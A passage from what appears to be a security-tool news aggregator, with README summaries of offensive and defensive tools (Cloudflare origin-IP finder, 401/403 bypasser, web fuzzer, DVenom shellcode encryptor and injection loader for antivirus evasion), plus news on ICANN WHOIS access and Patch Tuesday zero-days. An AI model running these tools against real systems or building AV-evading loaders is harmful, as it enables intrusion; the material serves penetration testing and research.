$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
│ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
│ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
└──────────────┴───────────────────┴─────────────┴──────────────────────────────┘

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



ICANN Launches Service to Help With WHOIS Lookups

More than five years after domain name registrars started redacting personal data from all public domain registration records, the non-profit organization overseeing the domain industry has introduced a centralized online service designed to make it easier for researchers, law enforcement and others to request the information directly from registrars.

In May 2018, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — instructed all registrars to redact the customer’s name, address, phone number and email from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges.

ICANN made the policy change in response to the General Data Protection Regulation (GDPR), a law enacted by the European Parliament that requires companies to gain affirmative consent for any personal information they collect on people within the European Union. In the meantime, registrars were to continue collecting the data but not publish it, and ICANN promised it would develop a system that facilitates access to this information.

At the end of November 2023, ICANN launched the Registration Data Request Service (RDRS), which is designed as a one-stop shop to submit registration data requests to participating registrars. This video from ICANN walks through how the system works.

Accredited registrars don’t have to participate, but ICANN is asking all registrars to join and says participants can opt out or stop using it at any time. ICANN contends that the use of a standardized request form makes it easier for the correct information and supporting documents to be provided to evaluate a request.

ICANN says the RDRS doesn’t guarantee access to requested registration data, and that all communication and data disclosure between the registrars and requestors takes place outside of the system. The service can’t be used to request WHOIS data tied to country-code top level domains (CCTLDs), such as those ending in .de (Germany) or .nz (New Zealand), for example.

The RDRS portal.

As Catalin Cimpanu writes for Risky Business News, currently investigators can file legal requests or abuse reports with each individual registrar, but the idea behind the RDRS is to create a place where requests from “verified” parties can be honored faster and with a higher degree of trust.

The registrar community generally views public WHOIS data as a nuisance issue for their domain customers and an unwelcome cost-center. Privacy advocates maintain that cybercriminals don’t provide their real information in registration records anyway, and that requiring WHOIS data to be public simply causes domain registrants to be pestered by spammers, scammers and stalkers.

Meanwhile, security experts argue that even in cases where online abusers provide intentionally misleading or false information in WHOIS records, that information is still extremely useful in mapping the extent of their malware, phishing and scamming operations. What’s more, the overwhelming majority of phishing is performed with the help of compromised domains, and the primary method for cleaning up those compromises is using WHOIS data to contact the victim and/or their hosting provider.

Anyone looking for copious examples of both need only to search this Web site for the term “WHOIS,” which yields dozens of stories and investigations that simply would not have been possible without the data available in the global WHOIS records.

KrebsOnSecurity remains doubtful that participating registrars will be any more likely to share WHOIS data with researchers just because the request comes through ICANN. But I look forward to being wrong on this one, and will certainly mention it in my reporting if the RDRS proves useful.

Regardless of whether the RDRS succeeds or fails, there is another European law that takes effect in 2024 which is likely to place additional pressure on registrars to respond to legitimate WHOIS data requests. The new Network and Information Security Directive (NIS2), which EU member states have until October 2024 to implement, requires registrars to keep much more accurate WHOIS records, and to respond within as little as 24 hours to WHOIS data requests tied everything from phishing, malware and spam to copyright and brand enforcement.

GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

Black Hat Arsenal 2024 Next Stop Singapore !

Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

How to Handle Retail SaaS Security on Cyber Monday

If forecasters are right, over the course of today, consumers will spend&nbsp;$13.7 billion. Just about every click, sale, and engagement will be captured by a CRM platform. Inventory applications will trigger automated re-orders; communication tools will send automated email and text messages confirming sales and sharing shipping information.&nbsp; SaaS applications supporting retail efforts

Tell Me Your Secrets Without Telling Me Your Secrets

The title of this article probably sounds like the caption to a meme. Instead, this is an actual problem GitGuardian's engineers had to solve in implementing the mechanisms for their new HasMySecretLeaked service. They wanted to help developers find out if their secrets (passwords, API keys, private keys, cryptographic certificates, etc.) had found their way into public GitHub repositories. How

ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R


Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.


Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Installing

  • Install python requirements

    pip install -r requirements.txt

Usage

General application arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
-s, --save-config Save config file for easy future usage Optional
-c, --config Config file path, default is config.json Optional
-o, --output-dir Directory in which to output any generated files, default is output Optional
-v, --verbose Log output to a file as well as the console Optional
-p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

Specific plugin arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
--ip Addresses file path, CIDR or IP addresses csv (ip column required).
add more columns for additional info about each ip (username, pass, etc...)
Required
--port Port number Optional
--transport tcp/udp Optional
--analyzer Analyzer name to run Optional

Executing examples in the command line

 python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
"parameters": {
},
"analyzers": []
})
forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
def __init__(self, folder_name):
super().__init__(folder_name)
self.name = "General"
self.description = "General Plugin Description"
self.port = 123
self.transport = Transport.TCP

def flags(self, parser):
self.base_flags(parser, self.port, self.transport)
parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)

def connect(self, address):
self.logger.info(f"{self.config.name} connect")

def export(self, extracted):
self.logger.info(f"{self.config.name} export")
  • Make sure to import your new plugin in the __init__.py file under the plugins folder
  • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    there are 2 mandatory functions (connect, export).
    the connect function receives single ip address and extracts any relevant information from the device and return it.
    the export function receives the information that was extracted from all the devices and there you can export it to file.
  • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
    there is a single mandatory function (flags).
    In which you must call base_flags, and you can add any additional flags that you want to have.

Adding Analyzers

  • Create new directory under analyzers folder with the plugin name that related to your analyzer.
  • Create new Python file with your analyzer name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
self.plugin_name = 'General'
self.create_output_dir(self.plugin_name)

def analyze(self):
pass
  • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



Microsoft Patch Tuesday, November 2023 Edition

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

Kevin Breen, senior director of threat research at Immersive Labs, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said Mike Walters, president and co-founder of the security firm Action1. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 at later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running Microsoft Exchange Server should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the SANS Internet Storm Center points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in ASP.NET Core, with a CVSS score of 8.2; and CVE-2023-36413: A Microsoft Office security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R


Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 forbidden_buster.py -u http://example.com

Forbidden Buster accepts the following arguments:

fuzzing (stressful) --include-user-agent Include User-Agent fuzzing (stressful)" dir="auto">
  -h, --help            show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)

Example Usage:

python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


CryptoChat - Beyond Secure Messaging

By: Zion3R


Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

  1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
  2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
  3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
  4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
  5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
  6. Group Chats: Have encrypted conversations with multiple people at once.

  • Python 3.x
  • cryptography
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/CryptoChat.git
  2. Navigate to the project directory:

    cd CryptoChat
  3. Install the required dependencies:

    pip install -r requirements.txt

bind the server to. --port PORT The port number to bind the server to. -------------------------------------------------------------------------- $ python3 client.py --help usage: client.py [-h] [--host HOST] [--port PORT] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The server's IP address. --port PORT The port number of the server." dir="auto">
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.

secret key for encryption. (Default=mysecretpassword) -------------------------------------------------------------------------- $ python3 clientE.py --help usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The IP address to bind the server to. (Default=127.0.0.1) --port PORT The port number to bind the server to. (Default=12345) --key KEY The secret key for encryption. (Default=mysecretpassword)" dir="auto">
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
  • --help: show this help message and exit
  • --host: The IP address to bind the server.
  • --port: The port number to bind the server.
  • --key : The secret key for encryption

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

By: Zion3R


Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.

  • Capable of bypassing some well-known antivirus (AVs).
  • Offers multiple encryption methods including RC4, AES256, XOR, and ROT.
  • Produces source code in C#, Rust, PowerShell, ASPX, and VBA.
  • Employs different shellcode loading techniques: VirtualAlloc, Process Injection, NT Section Injection, Hollow Process Injection.

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

  • Golang installed.
  • Basic understanding of shellcode operations.
  • Familiarity with C#, Rust, PowerShell, ASPX, or VBA.

To clone and run this application, you'll need Git installed on your computer. From your command line:

# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/

After installation, you can run the tool using the following command:

./dvenom -h

  • -e: Specify the encryption type for the shellcode (Supported types: xor, rot, aes256, rc4).
  • -key: Provide the encryption key.
  • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
  • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
  • -procname: Provide the process name to be injected (default is "explorer").
  • -scfile: Provide the path to the shellcode file.

To generate c# source code that contains encrypted shellcode.

Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

Language Supported Methods Supported Encryption
C# valloc, pinject, hollow, ntinject xor, rot, aes256, rc4
Rust pinject, hollow, ntinject xor, rot, rc4
PowerShell valloc, pinject xor, rot
ASPX valloc xor, rot
VBA valloc xor, rot

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

This project is licensed under the MIT License - see the LICENSE file for details.

